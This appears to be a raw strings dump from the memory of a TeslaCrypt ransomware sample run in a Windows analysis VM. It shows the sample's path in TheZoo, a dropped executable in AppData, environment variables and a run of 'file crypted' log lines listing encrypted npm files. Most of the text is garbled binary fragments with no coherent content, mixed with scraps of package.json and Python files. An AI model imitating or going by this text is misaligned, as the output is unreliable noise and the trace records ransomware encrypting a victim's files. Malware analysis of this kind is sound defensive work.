x{n
s`+
sp/
sP-
sP.
s0:
s@,
sp;
sP>
sp;
s`+
s`2
sP-
sP.
s0:
sp;
sP>
sp;
s E
s@I
s`V
s0\
s`S
s`H
s@I
s`U
s0\
s0S
s`^
s@`
s@`
s@`
s@`
sP`
s``
s `
s0`
\SECURITY\LSA_AUTHENTICATION_INITIALIZED
h6o
P|n
`h:w
@h:w
v0I
v0I
_G-w
%0w
0^p
'-w
m:w
v_G-wj
vT`
v^~m
(\p
x_p
0wB
/-wp
H-w
_G-wz
f~m
-w_G-wZ
_G-w
-wJ
hwo
P?s
0]s
%0w
0Jo
0Jo
v~--w
'-w
m:w0Jo
v0Jo
xWp
vxWp
vaQ
8[p
vhy
Z,w
Z,w
P]s
p/w
Z,w
Z,w
Z,w
Z,w
Z,w
90w
,wP
\ln
}X/wP
0wj
MX/w
8c1w
,wP
px]
8eq
.ipv6-literal.net
.[4
DESKTOP-AERI7HN
DESKTOP-AERI7HN
_G-w
+wX
-wr_
~--w
~--w
.wv
 0wI5
uQI@
\device\harddiskvolume4\users\dummy\desktop\sysinterals\procdump\procdump.exe
10.1000_x64__kzf8qxf38zg5c\skypehost.exe
}X/w
0wj
MX/w
8c1w
s n
s`\
v`I
.?AV?$basic_iostream@GU?$char_traits@G@std@@@std@@
.?AV?$basic_istream@GU?$char_traits@G@std@@@std@@
.?AV?$basic_ios@GU?$char_traits@G@std@@@std@@
.?AVios_base@std@@
.?AV?$_Iosb@H@std@@
.?AV?$basic_ostream@GU?$char_traits@G@std@@@std@@
.?AV?$basic_iostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_istream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_istream@_WU?$char_traits@_W@std@@@std@@
.?AV?$basic_ios@_WU?$char_traits@_W@std@@@std@@
.?AV?$basic_ostream@_WU?$char_traits@_W@std@@@std@@
.?AV_Locimp@locale@std@@
.?AVfacet@locale@std@@
.?AV_Facet_base@std@@
.?AU_Crt_new_delete@std@@
.?AV?$basic_filebuf@GU?$char_traits@G@std@@@std@@
.?AV?$basic_streambuf@GU?$char_traits@G@std@@@std@@
.?AV?$basic_filebuf@_WU?$char_traits@_W@std@@@std@@
.?AV?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@
.?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AV?$_Ref_count_obj@V__ExceptionPtr@@@std@@
.?AV_Ref_count_base@std@@
.?AV?$moneypunct@G$00@std@@
.?AV?$_Mpunct@G@std@@
.?AUmoney_base@std@@
.?AV?$moneypunct@G$0A@@std@@
.?AV?$moneypunct@_W$00@std@@
.?AV?$_Mpunct@_W@std@@
.?AV?$moneypunct@_W$0A@@std@@
.?AV?$moneypunct@D$00@std@@
.?AV?$_Mpunct@D@std@@
.?AV?$moneypunct@D$0A@@std@@
.?AV?$codecvt@_WDU_Mbstatet@@@std@@
.?AV?$codecvt@GDU_Mbstatet@@@std@@
.?AV?$ctype@D@std@@
.?AUctype_base@std@@
.?AV?$ctype@_W@std@@
.?AV?$ctype@G@std@@
.?AV?$codecvt@DDU_Mbstatet@@@std@@
.?AV?$time_get@GV?$istreambuf_iterator@GU?$char_traits@G@std@@@std@@@std@@
.?AUtime_base@std@@
.?AV?$messages@G@std@@
.?AUmessages_base@std@@
.?AV?$numpunct@G@std@@
.?AV?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@
.?AV?$messages@_W@std@@
.?AV?$numpunct@_W@std@@
.?AV?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
.?AV?$messages@D@std@@
.?AV?$numpunct@D@std@@
.?AV?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
.?AV?$num_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
.?AV?$time_put@GV?$ostreambuf_iterator@GU?$char_traits@G@std@@@std@@@std@@
.?AV?$money_put@GV?$ostreambuf_iterator@GU?$char_traits@G@std@@@std@@@std@@
.?AV?$money_get@GV?$istreambuf_iterator@GU?$char_traits@G@std@@@std@@@std@@
.?AV?$collate@G@std@@
.?AV?$num_put@GV?$ostreambuf_iterator@GU?$char_traits@G@std@@@std@@@std@@
.?AV?$num_get@GV?$istreambuf_iterator@GU?$char_traits@G@std@@@std@@@std@@
.?AV?$time_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@
.?AV?$money_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@
.?AV?$money_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@
.?AV?$collate@_W@std@@
.?AV?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@
.?AV?$num_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@
.?AV?$time_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
.?AV?$money_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
.?AV?$money_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
.?AV?$collate@D@std@@
.?AVbad_alloc@std@@
.?AVstl_condition_variable_win7@details@Concurrency@@
.?AVstl_condition_variable_interface@details@Concurrency@@
.?AVstl_critical_section_win7@details@Concurrency@@
.?AVstl_critical_section_interface@details@Concurrency@@
.?AVexception@std@@
.?AVcodecvt_base@std@@
.?AVtype_info@@
.?AVbad_array_new_length@std@@
.?AVfailure@ios_base@std@@
.?AVruntime_error@std@@
.?AVerror_category@std@@
.?AVsystem_error@std@@
.?AV_Generic_error_category@std@@
.?AV?$codecvt@_UDU_Mbstatet@@@std@@
.?AV_Iostream_error_category@std@@
.?AVbad_cast@std@@
.?AV?$codecvt@_SDU_Mbstatet@@@std@@
.?AV_System_error@std@@
.?AVlogic_error@std@@
.?AVfuture_error@std@@
.?AV_System_error_category@std@@
.?AVlength_error@std@@
.?AVregex_error@std@@
.?AVout_of_range@std@@
.?AVoverflow_error@std@@
.?AVinvalid_argument@std@@
.?AVbad_function_call@std@@
.?AVbad_exception@std@@
.?AV?$_Ref_count_obj_alloc@V__ExceptionPtr@@U?$_StaticAllocator@H@@@std@@
.?AV?$basic_iostream@_WU?$char_traits@_W@std@@@std@@
(u
(uT
(uP
(uX
(u
(u@
(uT
(uP
(uX
(u0
csm
6fs
6fs
!es
xko
esH
d5s
by6s
M2s
f2s
M2s
cm2s
"0w#
hd5s
90w#
x05s
d5s
x05s
 qw
d5s
c5s
42s
4b2s
 qw
 qw
cj2s
Y2s
cm2s
\??\C:\Windows\SysWOW64\NTASN1.dll
64\NTASN1.dll
\??\C:\Windows\SYSTEM32\NTASN1.dll
l"0w#
hd5s
90w#
QvX@Nv
ANv
XENv
XENv
`FNv
`FNv
FNv
`FNv
 GNv
fOv
;Nv
t_Nv
_Nv
_Nv
_Nv
_Nv
Ov-
Ov2
OvD
OvJ
OvL
Ov-
Ov2
OvD
OvJ
OvL
C*W
Qvx
Qv0
<Nv
<Nv
<Nv
<Nv
<Nv
|<Nv
<Nv
<Nv
<Nv
<Nv
<Nv|<Nv
Ov{
Ov,
OvE
Ov`
Ovj
Ovt
Ov~
Ov"
Ov(
Ov2
OvF
OvP
OvZ
Ovd
Ovn
Ovx
OvU
Ovp
Ov&
OvF
Ovf
Ovp
Ov'
Ov'
Ov1
Ov;
OvL
Ovg
Ov)
Ov3
Ov=
OvG
OvQ
Ovd
Ovc
Ovv
Ov2
OvQ
OvZ
Ov1
OvE
Ov(
Ov~
OvO
Ov<
OvF
Ov6
Ov'
OvP
Ov[
OvX
82BD0E67-9FEA-4748-8672-D5EFE5B779B0
=#D}U0
XTq
H9q
@5q
Ha4
|:w3
x7p
q 1
q`F
q /
q0Z
q0Z
 3u
)0u
$3u
$3u
x+1u
+1u
+1ub,1uX,1u
+1u
+1u
+1u
+1u
+1u
+1u
,1u
,1u
,1u&,1u0,1u:,1uD,1uN,1u
+1u
+1u
q:[
qDX
q)X
sP"
s`Y
s n
v0X
v`I
v@L
v0I
wpq
w@[
wp}
v A
n`:
q|Y
qiX
Dn`
Bn0sFn
QCn
Bn`
Dn oFnP
En`
BnP
Cn0
Bn0
\Fn
fFn
gFn
Cn0gFn
pCn0
8Fn
Bn@
qkZ
quZ
qFZ
Pzq
xyq
ply
s@
/OOqN
s`t
(/J
SAD
JJn8
wuF
sPt
sPt
<X9M
s|h
s g
s g
s`<
H\o
`to
h:w
`1l
(.l
 ~HZ.6
)S)
3BF8E23244C113492240612F72F0A6CE7538887A7BE4D0940EB890D5167F9096
*Ea~
 : 3,
  "b" : 4,
  "c" : 5
0*/w
pHD
0ID
PID
pID
0JD
PJD
pJD



abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
pcl
=]n
4Ok
/`0l
x1l
:To
lT3
p0f
I:Y
MJ:;/
9 n
18i
aXSB_p$
3R&
;N}
if'N
b9:
`1l
15%
01l
`1l
!=Zx
`1l
3BF8E23244C113492240612F72F0A6CE7538887A7BE4D0940EB890D5167F9096
top
me": "example",
  "version": "0.0.0",
  "devDependencies": {
    "plugin-wrapper": "0.0.0",
    "framework": "0.0.0"
  }
  },
  "license": "BSD"
C:\Users\Dummy\AppData\Roaming\tpoawuj.exe
@ l
h l
H!l
H'l
0(l
`(l
()l
@+l
x+l
(,l
h,l
0-l
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\Dummy\AppData\Roaming
CommonProgramFiles=C:\Program Files (x86)\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=DESKTOP-AERI7HN
ComSpec=C:\Windows\system32\cmd.exe
FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer
FPS_BROWSER_USER_PROFILE_STRING=Default
HOMEDRIVE=C:
HOMEPATH=\Users\Dummy
LOCALAPPDATA=C:\Users\Dummy\AppData\Local
LOGONSERVER=\\DESKTOP-AERI7HN
NUMBER_OF_PROCESSORS=4
OneDrive=C:\Users\Dummy\OneDrive
OS=Windows_NT
Path=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\Dummy\Desktop\sysinterals\Procdump;C:\Users\Dummy\Desktop\sysinterals\Strings;C:\Users\Dummy\Desktop\sysinterals\ProcessMonitor;C:\Users\Dummy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Python 3.7;C:\Program Files\Git\cmd;C:\Program Files\nodejs\;C:\Users\Dummy\AppData\Local\Programs\Python\Python37\Scripts\;C:\Users\Dummy\AppData\Local\Programs\Python\Python37\;C:\Users\Dummy\AppData\Local\Microsoft\WindowsApps;C:\Users\Dummy\AppData\Roaming\npm
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_ARCHITEW6432=AMD64
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 142 Stepping 9, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=8e09
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files (x86)
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PSModulePath=C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
PUBLIC=C:\Users\Public
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Users\Dummy\AppData\Local\Temp
TMP=C:\Users\Dummy\AppData\Local\Temp
USERDOMAIN=DESKTOP-AERI7HN
USERDOMAIN_ROAMINGPROFILE=DESKTOP-AERI7HN
USERNAME=Dummy
USERPROFILE=C:\Users\Dummy
windir=C:\Windows
l r
Iki
6a*
iJ2
]D=
U('
Q`%
|%,
I]{Pc
e N
okG
C0p
$tb
  packages=['gyp', 'gyp.generator'],
  entry_points = {'console_scripts': ['gyp=gyp:script_main'] }
3BF8E23244C113492240612F72F0A6CE7538887A7BE4D0940EB890D5167F9096
 2l
H$i"
7Sp
cv8#
_sb
6}^
3:Uwj
15Rp
F7H
\" && exit 1"
  },
  "dependencies": {
    "@my-scope/package-a": "^0.0.0"
  }
 fl
$bl
#<Vq
*=Qf|
2Po
>Xs
,?Sh~
4Rq
5Q{
%:Pg
$Cct
 :Uq
'8J]q
5Rp
$;SG{
'LK:
    "main": "."
AA6
7KSW
]CmL
7Whz
.Ie
)>Tk
  "main": "main.js"
    "main": "./"
 ;Wt
0F]u
    "main": "wrong.js"
Hb}
$6I]r
!>\{
Vh{
7Sp
,BYq
D^y
 2EYn
:Xw
)AZt
%6H[o
3Pn
r/a@"I
 ll
(nl
(.l
me": "monorepo-symlink-test",
  "private": true,
  "version": "0.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "postinstall": "lerna bootstrap",
    "test": "node packages/package-a"
  },
  "author": "",
  "license": "MIT",
  "dependencies": {
    "jquery": "^3.3.1",
    "resolve": "../../../"
  },
  "devDependencies": {
    "lerna": "^3.4.3"
  }
cript_main())
MIT"
`1l
Hfl
<ll
#@^}
 ?_
'Db
pfl
Dnl
1BTg{
1BTg{
0*/w
s\npm\node_modules\read-installed\test\fixtures\package.json <br>
file crypted C:\\Program Files\nodejs\node_modules\npm\node_modules\read-package-json\package.json <br>
file crypted C:\\Program Files\nodejs\node_modules\npm\node_modules\read-package-tree\package.json <br>
file crypted C:\\Program Files\nodejs\node_modules\npm\node_modules\readable-stream\package.json <br>
file crypted C:\\Program Files\nodejs\node_modules\npm\node_modules\readdir-scoped-modules\package.json <br>
file crypted C:\\Program Files\nodejs\node_modules\npm\node_modules\registry-auth-token\package.json <br>
file crypted C:\\Program Files\nodejs\node_modules\npm\node_modules\registry-url\package.json <br>
file crypted C:\\Program Files\nodejs\node_modules\npm\node_modules\request\package.json <br>
file crypted C:\\Program Files\nodejs\node_modules\npm\node_modules\require-directory\package.json <br>
file crypted C:\\Program Files\nodejs\node_modules\npm\node_modules\require-main-filename\LICENSE.txt <br>
file crypted C:\\Program Files\nodejs\node_modules\npm\node_modules\require-main-filename\package.json <br>
file crypted C:\\Program Files\nodejs\node_modules\npm\node_modules\resolve-from\package.json <br>
file crypted C:\\Program Files\nodejs\node_modules\npm\node_modules\retry\package.json <br>
file crypted C:\\Program Files\nodejs\node_modules\npm\node_modules\rimraf\package.json <br>
file crypted C:\\Program Files\nodejs\node_modules\npm\node_modules\run-queue\node_modules\aproba\package.json <br>
file crypted C:\\Program Files\nodejs\node_modules\npm\node_modules\run-queue\package.json <br>
file crypted C:\\Program Files\nodejs\node_modules\npm\node_modules\safe-buffer\package.json <br>
raneous-dev-dep\package.json <br>
file crypted C:\\Program Files\nodejs\node_modules\npm\node_modules\read-installed\test\fixtures\grandparent-peer\package.json <br>
file crypted C:\\Program Files\nodejs\node_modules\npm\node_modules\read-installed\test\fixtures\grandparent-peer-dev\package.json <br>
file crypted C:\\Program Files\nodejs\node_module
(.l
,Fa}
-AVl
"@_
#<Vq
*=Qf|
2Po
3Lf
(:Mav
%B`
QsOzCg
3Lf
(:Mav
%B`
+C\v
'8J]q
5Rp
$;Sl
7HZm
)Eb
  ug
0CWl
8Vu
!9Rl
.@Sg|
+Hf
1Ib|
->Pcw
;Xv
*AYr
=N`s
oxy-gg
>Pcw
;Xv
*AYr
=N`s
/Kh
$:Qi
-M^p
$?[x
4Jay
=]n
1.0"
3H^u
2Qq
.Hc
/CXn
$Ba
%>Xs
,?Sh~
4Rq
5Nh
*<Oc  "/
(;Odz
0Nm
1Jd
&8K_t
#@^}
)AZt
%6H[o
3Pn
"9Qj
5FXk
regi
 :Uq
!5J`w
4Ss
0Je
1EZp
&Dc
'@Zu
.AUj
6Ts
3763
N`s
/Kh
$:Qi
-M^p
$?[x
4Jay
=]n
4Ok
/DZq
.Mm~
h-ha
4Ni
"5I^t
*Hg
+D^y
 2EYn
:Xw
#;Tn
0BUi~
-Jh
tp:/
(B]y
)=Rh
<[{
8Rm
&9Mbx
.Lk
/Hb}
$6I]r
!>\{
  "
/CXn
$Ba
%>Xs
,?Sh~
4Rq
5Nh
*<Ocx
'Db
-E^x
):L_sreca
$>Yu
%9Nd{
8Ww
4Ni
"5I^t
*Hg
+D^y
 2EYn
:Xw
: {
,?Sh~
4Rq
5Nh
*<Ocx
'Db
-E^x
):L_s
7Tr
&=Un
9J\o
 "ht
/G`z
+<Nau
9Vt
(?Wp
;L^q
-If
"8Og
+K\n
"=Yv
 "en
$6I]r
!>\{
'?Xr
#4FYm
1Nl
 7Oh
3DVi}
%A^|
0G_x
#CTfy
"rep?fd
#7Lby
6Uu
2Lg
 3G\r
(Fe
)B\w
0CWl
8Vu
!9Rl
.@Sg  "s1fV
.@Sg|
+Hf
1Ib|
->Pcw
;Xv
*AYr
=N`s
/Kh
$:Qi
-M^p
-V#f@
/DZq
.Mm~
*D_{
+?Tj
 >]}
!:To
(;Odz
0Nm
1Jd
&8K_>8t
  "_from": "safer-buffer@>= 2.1.2 < 3",
  "_id": "safer-buffer@2.1.2",
  "_inBundle": false,
  "_integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==",
  "_location": "/safer-buffer",
  "_phantomChildren": {},
  "_requested": {
    "type": "range",
    "registry": true,
    "raw": "safer-buffer@>= 2.1.2 < 3",
    "name": "safer-buffer",
    "escapedName": "safer-buffer",
    "rawSpec": ">= 2.1.2 < 3",
    "saveSpec": null,
    "fetchSpec": ">= 2.1.2 < 3"
  },
  "_requiredBy": [
    "/iconv-lite"
  ],
  "_resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz",
  "_shasum": "44fa161b0187b9549dd84bb91802f9bd8385cd6a",
  "_spec": "safer-buffer@>= 2.1.2 < 3",
  "_where": "/Users/rebecca/code/npm/node_modules/iconv-lite",
  "author": {
    "name": "Nikita Skovoroda",
    "email": "chalkerx@gmail.com",
    "url": "https://github.com/ChALkeR"
  },
  "bugs": {
    "url": "https://github.com/ChALkeR/safer-buffer/issues"
  },
  "bundleDependencies": false,
  "deprecated": false,
  "description": "Modern Buffer API polyfill without footguns",
  "devDependencies": {
    "standard": "^11.0.1",
    "tape": "^4.9.0"
  },
  "files": [
    "Porting-Buffer.md",
    "Readme.md",
    "tests.js",
    "dangerous.js",
    "safer.js"
  ],
  "homepage": "https://github.com/ChALkeR/safer-buffer#readme",
  "license": "MIT",
  "main": "safer.js",
  "name": "safer-buffer",
  "repository": {
    "type": "git",
    "url": "git+https://github.com/ChALkeR/safer-buffer.git"
  },
  "scripts": {
    "browserify-test": "browserify --external tape tests.js > browserify-tests.js && tape browserify-tests.js",
    "test": "standard && tape tests.js"
  },
  "version": "2.1.2"
|yp
n4PH
2O!
Z*M
&/B
'n1
O:e
+Cm
* vV
B*?.dI
sg0
<~^
#<g
dGMZ
Fyv9
iib
Q}}
x6W
{?2;cs-
NY:
:v1
4hL
q|p4
D-&"
~f#
C=#J>O
U&C
T8X
v:f
nL,l
\Jq0
KS6
N^G@
IfU
S\WA
~e0
BD;
_dG
^h.
I/`
3'^s
qzsd
=(!
ARY
=&t
2fV
Bl&u
9o1
HP5i
Mm~^r
Fp~_
P_U
Haj
`RK
Eqx
7tAZoB
}pp
(.l
Ccp
j-Sg
YonB
ynr
MW,
Y/F:)
(.l
c?)S
/K[
qAm%
(.l
kBx!
5NZ
K".
<46%|!
pyp%
2Th
(.l
Bd[-
f~m
}wD
\X9
C{_
].dQ
j+e!K$u
:+Y0
,9
xGLh
_/mU
{_A0
C(k
(.l
?{y
*=^
"kt
`tH
B4ZL
:Si
Coj
|EOp
(.l
y6sk
?]r
Th/
  (projects, deps) = ParseSolution(sys.argv[1])
  PrintDependencies(projects, deps)
  PrintBuildOrder(projects, deps)
  if '--recursive' in sys.argv:
    PrintVCProj(projects)
  return 0
if __name__ == '__main__':
  sys.exit(main())
,myh
_ksd
M\/
U^W
ofU
$lxz@(
yBz
`1l
l8l8l
s`*
0pq
zedv5
PMy
F_B
F_B
f2s
cm2s
,0w#
hd5s
90w#
hu
muh
q@W
q@0fu
mue
mud
juP4
q@2
gup
(5u0(5u
'5u
'5u0$5u
#5u
%5up$5u
&5u0&5u@'4u
4u@
4u`
(4uP/4uPD4upE4u`G4u
P4u
4u`
4u@
4uP
/4up:4u`L4u
4u@
-4u
4u`
)4u
4u`
E4u
A4u
&4u
)4u
*4u
R4u`
w5u
4up
"4u
Q4u
5uP~5u
L4u@L4up
|5u
V1w
(Oeu8Oeu
V1w
@OeuTOeu
W1w
`OeutOeu
 W1w
@W1w
Oeu
Oeu
`W1w
Oeu
Oeu
W1w
Oeu
Oeu
W1w
5eu
Oeu
W1w
Oeu
Oeu
Oeu
Oeu
ju4
Peu(Peu
ju4
8Peu`Peu
tPeu
Peu
Peu
Peu
W1w
Peu
Peu
Ahu Ahu0 gu
1Qeu
,fu`
,fu
fu
ku@
ku`
ku0
Dhu
Ahu
DhupDhu`DhuPDhuJ
USER32
windows.hlp
PGo
vpF
 Ho
0W1w@W1w
W1w
s O
@0P
@0P
p,P
PVU
PVU
_0*
`"0
Sd^
=::=::\
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\Dummy\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=DESKTOP-AERI7HN
ComSpec=C:\Windows\system32\cmd.exe
FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer
FPS_BROWSER_USER_PROFILE_STRING=Default
HOMEDRIVE=C:
HOMEPATH=\Users\Dummy
LOCALAPPDATA=C:\Users\Dummy\AppData\Local
LOGONSERVER=\\DESKTOP-AERI7HN
NUMBER_OF_PROCESSORS=4
OneDrive=C:\Users\Dummy\OneDrive
OS=Windows_NT
Path=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\Dummy\Desktop\sysinterals\Procdump;C:\Users\Dummy\Desktop\sysinterals\Strings;C:\Users\Dummy\Desktop\sysinterals\ProcessMonitor;C:\Users\Dummy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Python 3.7;C:\Program Files\Git\cmd;C:\Program Files\nodejs\;C:\Users\Dummy\AppData\Local\Programs\Python\Python37\Scripts\;C:\Users\Dummy\AppData\Local\Programs\Python\Python37\;C:\Users\Dummy\AppData\Local\Microsoft\WindowsApps;C:\Users\Dummy\AppData\Roaming\npm
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE=AMD64
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 142 Stepping 9, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=8e09
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PSModulePath=C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
PUBLIC=C:\Users\Public
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Users\Dummy\AppData\Local\Temp
TMP=C:\Users\Dummy\AppData\Local\Temp
USERDOMAIN=DESKTOP-AERI7HN
USERDOMAIN_ROAMINGPROFILE=DESKTOP-AERI7HN
USERNAME=Dummy
USERPROFILE=C:\Users\Dummy
windir=C:\Windows
s\Dummy
windir=C:\Windows
dows
dows
`*P
.%P
C:\Users\Dummy\Desktop\TheZoo\theZoo\malwares\Binaries\Ransomware.TeslaCrypt\Ransomware.TeslaCrypt\
C:\Users\Dummy\AppData\Roaming\tpoawuj.exe
C:\Users\Dummy\AppData\Roaming\tpoawuj.exe
C:\Users\Dummy\AppData\Roaming\tpoawuj.exe
Winsta0\Default
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32
C:\Windows\SYSTEM32;C:\Windows\system;C:\Windows;
`-P
p-P
@(P
@(P
@(P
(1P
(.P
1;P
 'P
(.P
@.P
@)P
@)P
`*P
C:\Windows\
\Users\Dummy
ppData\Local
5fb7772b
`{f
P/}
A1s
ws\system32\wow64cpu.dll
`0P
p0P
 'P
p:P
`q3s
F5@U
h)P
0;P
C:\Windows\System32\wow64.dll
C:\Windows\System32\wow64cpu.dll
\Sessions\1\Windows\ApiPortectionow6
P:P
`-P
`:P
p-P
0'P
1;P
@2P
p,P
@0P
exe
C:\Windows\System32\wow64win.dll
@2P
@2P
P2P
P2P
`2P
`2P
p2P
p2P
 3P
 3P
03P
03P
@3P
@3P
P3P
P3P
`3P
`3P
p3P
p3P
 4P
 4P
04P
04P
@4P
@4P
P4P
P4P
`4P
`4P
p4P
p4P
 5P
 5P
05P
05P
@5P
@5P
P5P
P5P
`5P
`5P
p5P
p5P
 6P
 6P
06P
06P
@6P
@6P
P6P
P6P
`6P
`6P
p6P
p6P
 7P
 7P
07P
07P
@7P
@7P
P7P
P7P
`7P
`7P
p7P
p7P
 8P
 8P
08P
08P
@8P
@8P
P8P
P8P
`8P
`8P
p8P
p8P
 9P
 9P
09P
09P
@9P
@9P
P9P
P9P
`9P
`9P
p9P
p9P
 :P
 :P
0:P
0:P
`0P
p0P
@/P
@/P
@/P
i)P
@1P
@.P
p,P
\Device\HarddiskVolume4\Users\Dummy\Desktop\sysinterals\Procdump\procdump.exe
10.1000_x64__kzf8qxf38zg5c\SkypeHost.exe
s\P3P\History
are Publishing
p,P
C:\Users\Dummy\Desktop\TheZoo\theZoo\malwares\Binaries\R
y\AppData\Local\Temp
USERDOMAIN=DESKTOP-AERI7HN
USERDOMAIN_ROAMINGPROFILE=DESKTOP-AERI7HN
USERNAME=Dummy
USERPROFILE=C:\Users\Dummy
windir=C:\Windows
p,P
\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Security
p,P
\REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows NT\DnsClient
\RB
p,P
INE\Software\WOW6432Node\Policies\Microsoft\Windows NT\DnsClient
p,P
BUhu
Uhu
UhucUhu
Phu
Phu
PhuoPhu_PhuOPhu
Phu.Phu
Rhu7Rhu
bhu
chu%chu5chuEchuUchuechuuchu
chu
chu
H-wx
_G-w:
ju]
0wB
/-w
">Ou
-FNu
n8@S
Dnf
Dn^l
Bn`
|:w
4,w%4,w@
`{:w,
0w/W/wt
|:w
Dn$
|:w
80w
.wB
!0w
.w$
#0ws+
`?Qu
u^p!
?Qu
`?Qu`?Qu
}X/w
0wj
MX/w
8c1w
`?Qu
8rD
9r8
9rX
9r\
9r8
9rX
8r|
8rT
9rH
8r(
9rh
9rh
9rH
8r8
9rx
8rx
9r8
9r4
!9r
8r\
 i3%
,9r
9rX
9rH
3)6{
97E
3)6{
Oyi
3)6{
Accept-Encoding: gzip, deflate
MIME\Database\Bootstrap Content Type
text/plain
8r{
  ;r@ ;r
JrX
exp
0w=
0wB
0w1
a)w
c)w
h)w
h)w
h)w
h)w
h)w
R:w
a)wXf)w
g)w
atan2
0wo
0wo
0wm
0wm
0wm
0wo
i)w
i)w
i)w
i)w
i)w
i)w!
i)w
i)w
i)w
i)w
i)w
i)w
i)w
i)w
i)w
i)w
i)w
j)w
i)w
j)w
j)w
j)w
 j)w
(j)w"
0j)w#
4j)w$
8j)w%
<j)w&
Dj)wpj)wrj)wrj)wrj)wrj)wrj)wrj)wrj)wrj)wrj)w
tj)wxj)wxj)wxj)wxj)wxj)wxj)wxj)w
e:w
V:w
V:w
)w@
g:w
S:w
S:w
T:w
T:w
T:w
T:w
`yw
~)w8})w
z)w
|)w
|)w
-)8|)w
37w
{)w
vlg
(/J
SAD
JJn8
X{)w
z)w
z)w
lz)w
y)w
vlg
y)w
(y)w
(/J
SAD
JJn8
f+E
wH4
x)w
x)w
S:w
S:w
 f:w
)w
LV)w8W:w8W:w
DW:wDW:w
*wTW:wTW:w
cos
log
?pow
sin
sqrt
atan
tan
yY.Y'
UnBGT
-co
Oh,
=Hj
4R]s0
@9K6
:^(
g%mFe"g
Nbe
>*O
mCf
lx&
/$l41
84s
bL!
irc
^!i
r_BVt
JSQw
,GiD
7`0
gEg
ML9
.{rm5 S
Y/}\
]0k)\
?e:T
Zdp
'AD
EX?a6e$
|2E
4kX}Ta
dcUS!"l5
A4A4Kw
@b/Z
oz\0\bR.1
(~kW
+,B4I
|M/&
?6ZB
}b6#~
sY=*
M[tG
<;d
-=!w?
.<R\mq
9E4C"BO3G
LLG
7C,
8<2V<}
5Y=
pn|6h\2k~)Flv
b-!A
two
qi:
ei"Pf'
UxiK
8c1w
g:w
f:w
h:w
S:w
(h:w
g:w
hh:w
h:w
h:w(h:w
h:whh:w
H6o
h:w
x0m
47m
D4m
tAm
tAm
z:w
z:wt
z:w
z:w
{:w
@{:w@{:wx
{:w
{:w
 /m
x0m
NETAPI32.DLL
NETUTILS.DLL
wkscli.dll
srvcli.dll
`1m
@41w
p1n
 /m
mbb
 /m
@a1w
@a1w
@a1w
@a1w
@a1w
xxw
Zgu
Zgu
Zgu
Zgu
 .ju
:ku
P;ku
0Kfu
Zgu
@*gu
`Lgu
[gu
[gu
[gu
[gu
.ju
@gu
[gu
*gu
`Lgu
`/ju
